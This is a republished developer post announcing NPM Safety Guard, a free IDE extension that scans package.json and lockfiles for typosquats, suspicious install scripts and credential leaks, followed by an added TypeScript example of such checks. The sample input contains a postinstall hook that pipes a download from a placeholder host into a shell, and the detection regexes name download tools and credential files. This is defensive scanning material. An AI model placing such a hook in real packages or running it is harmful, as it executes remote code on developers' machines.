{"slug": "i-built-a-free-ide-extension-to-catch-malicious-npm-packages-before-they-wreck", "title": "I built a free IDE extension to catch malicious npm packages before they wreck your project", "summary": "A developer built NPM Safety Guard, a free IDE extension that scans package.json and lockfiles for malicious npm packages across 22 detection layers. The tool catches typosquats, AI-hallucinated package names, suspicious scripts, and credential leaks without requiring a separate CLI step or account for core features.", "body_md": "Supply-chain attacks via npm are up year-over-year: packages like `event-stream`, the Lazarus group drops, and AI-hallucinated typosquats keep landing in real codebases.\n\nI got tired of finding out *after* the fact, so I built **NPM Safety Guard**.\n\nIt scans your `package.json` and lockfiles right inside your editor — no separate CLI step.\n\nHere's what it currently catches across **22 detection layers**:\n\n- Typosquats such as `lodahs` and `reàct`, and AI-hallucinated package names\n- Suspicious `preinstall`/`postinstall` scripts, surfaced before you run them\n- `eval` and payload patterns in the actual source\n- Credential leaks: `.env`, `.npmrc`, `.pem`\n\nAll free. No account required for the core layers. MIT licensed on the VS Code side.\n\nThe VS Code extension is TypeScript. The JetBrains plugin is Kotlin. They share the same detection signatures bundled at build time — no cloud dependency for the core scan.\n\nCVE lookups hit OSV.dev with a 24-hour local cache so you're not waiting on a network call every keystroke.\n\nHave you been burned by a supply-chain attack before? Or do you have a detection layer you wish existed? Drop it in the comments — I'm actively adding new signatures.", "url": "https://wpnews.pro/news/i-built-a-free-ide-extension-to-catch-malicious-npm-packages-before-they-wreck", "canonical_source": "https://dev.to/jomynn/i-built-a-free-ide-extension-to-catch-malicious-npm-packages-before-they-wreck-your-project-24oe", "published_at": "2026-06-18 10:16:30+00:00", "updated_at": "2026-06-18 10:21:12.811738+00:00", "lang": "en", "topics": ["developer-tools", "ai-safety", "ai-research"], "entities": ["NPM Safety Guard", "VS Code", "JetBrains", "OSV.dev", "npm", "event-stream", "Lazarus group"], "alternates": {"html": "https://wpnews.pro/news/i-built-a-free-ide-extension-to-catch-malicious-npm-packages-before-they-wreck", "markdown": "https://wpnews.pro/news/i-built-a-free-ide-extension-to-catch-malicious-npm-packages-before-they-wreck.md", "text": "https://wpnews.pro/news/i-built-a-free-ide-extension-to-catch-malicious-npm-packages-before-they-wreck.txt", "jsonld": "https://wpnews.pro/news/i-built-a-free-ide-extension-to-catch-malicious-npm-packages-before-they-wreck.jsonld"}}
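The post lists what its detection layers look for in `package.json` but not how such checks are made. The TypeScript below is an added example of the package.json side of that (typosquat distance, homoglyph folding, install-hook scripts, credential files); it is not NPM Safety Guard's code or its signatures. The popular-package list, the script and filename regexes, the severities and the sample package.json are all constructed for illustration. Lockfile scanning, source-payload scanning and the OSV.dev CVE lookup are not shown; the hallucinated-name case is deliberately left as "cannot decide offline", because it needs a registry existence check rather than a local heuristic.

```typescript
// Added example, not NPM Safety Guard's code. POPULAR, the regexes, the
// severities and SAMPLE_* are constructed for illustration.

const POPULAR: string[] = ["lodash", "react", "express", "chalk", "axios", "left-pad"];

// Hooks npm runs automatically during install (the two the post names plus
// the other install-time hooks).
const LIFECYCLE_HOOKS: string[] = ["preinstall", "install", "postinstall", "prepare"];

// Patterns that turn an install hook from "warn" into "stop".
const DANGEROUS_SCRIPT: RegExp =
  /\b(curl|wget)\b|\|\s*(sh|bash)\b|\beval\(|node\s+-e\b|base64|child_process/i;

// Files that must not end up in a published tarball.
const CREDENTIAL_FILE: RegExp = /(^|\/)\.env(\.[\w-]+)?$|(^|\/)\.npmrc$|\.pem$/i;

type Severity = "high" | "medium";

interface Finding { layer: string; subject: string; severity: Severity; detail: string; }

interface PackageJson {
  name?: string;
  scripts?: Record<string, string>;
  dependencies?: Record<string, string>;
  devDependencies?: Record<string, string>;
  files?: string[];
}

// Optimal string alignment distance: insert/delete/substitute plus adjacent
// transposition, so the swapped letters in "lodahs" are one edit from "lodash".
function osaDistance(a: string, b: string): number {
  const d: number[][] = Array.from({ length: a.length + 1 }, () => new Array<number>(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Decompose accented letters and drop the combining marks: "reàct" -> "react".
function foldName(name: string): string {
  return name.normalize("NFKD").replace(/[\u0300-\u036f]/g, "").toLowerCase();
}

function checkDependencyName(dep: string): Finding | null {
  if (POPULAR.includes(dep)) return null;
  // The public registry rejects non-URL-safe names, but a dependency can also
  // resolve from a git URL, a tarball or a private registry, so flag them anyway.
  if (/[^\x21-\x7e]/.test(dep)) {
    const folded = foldName(dep);
    const twin = POPULAR.includes(folded) ? `; folds to "${folded}"` : "";
    return { layer: "homoglyph", subject: dep, severity: "high", detail: `non-ASCII package name${twin}` };
  }
  for (const known of POPULAR) {
    if (osaDistance(dep, known) === 1) {
      return { layer: "typosquat", subject: dep, severity: "high", detail: `one edit away from "${known}"` };
    }
  }
  // Neither known nor near a known name (the hallucinated-name case): not
  // decidable offline, needs a registry existence lookup.
  return null;
}

function checkScripts(scripts: Record<string, string>): Finding[] {
  const out: Finding[] = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const body = scripts[hook];
    if (body === undefined) continue;
    const dangerous = DANGEROUS_SCRIPT.test(body);
    out.push({
      layer: "lifecycle-script",
      subject: hook,
      severity: dangerous ? "high" : "medium",
      detail: (dangerous ? "runs on install and matches a payload pattern: " : "runs automatically on install: ") + body,
    });
  }
  return out;
}

function checkCredentialFiles(paths: string[], where: string): Finding[] {
  return paths.filter((p) => CREDENTIAL_FILE.test(p)).map((p) => ({
    layer: "credential-leak", subject: p, severity: "high" as Severity, detail: `credential file listed in ${where}`,
  }));
}

// Entry point: parsed package.json plus, optionally, the workspace file list.
function scanPackageJson(pkg: PackageJson, workspaceFiles: string[] = []): Finding[] {
  const findings: Finding[] = [];
  const deps = { ...(pkg.dependencies || {}), ...(pkg.devDependencies || {}) };
  for (const dep of Object.keys(deps)) {
    const f = checkDependencyName(dep);
    if (f) findings.push(f);
  }
  findings.push(...checkScripts(pkg.scripts || {}));
  findings.push(...checkCredentialFiles(pkg.files || [], '"files"'));
  findings.push(...checkCredentialFiles(workspaceFiles, "the workspace"));
  return findings;
}

// Constructed sample input: one problem of each kind, plus two clean names.
const SAMPLE_PACKAGE: PackageJson = {
  name: "demo-app",
  scripts: { postinstall: "curl -s https://example.invalid/setup.sh | sh", test: "vitest" },
  dependencies: { lodahs: "^4.17.21", "reàct": "^18.2.0", express: "^4.19.2", "some-unknown-helper": "1.0.0" },
  files: ["dist", ".npmrc"],
};
const SAMPLE_WORKSPACE: string[] = ["src/index.ts", ".env.production", "package.json"];

const sampleFindings = scanPackageJson(SAMPLE_PACKAGE, SAMPLE_WORKSPACE);
for (const f of sampleFindings) console.log(`[${f.severity}] ${f.layer}: ${f.subject} (${f.detail})`);
```

On the constructed sample this reports five findings: `lodahs` (one edit from `lodash`), `reàct` (non-ASCII, folds to `react`), the `postinstall` hook (high, because it pipes a download into a shell), `.npmrc` in `files`, and `.env.production` in the workspace. `express` is known and `some-unknown-helper` is silently passed, which is the gap an online registry check has to close. An edit distance of exactly 1 against a curated list is a deliberately tight threshold: raising it catches more squats but starts flagging legitimately similar names, so an editor-integrated check should err toward low noise and leave broader matching to a CLI or CI gate.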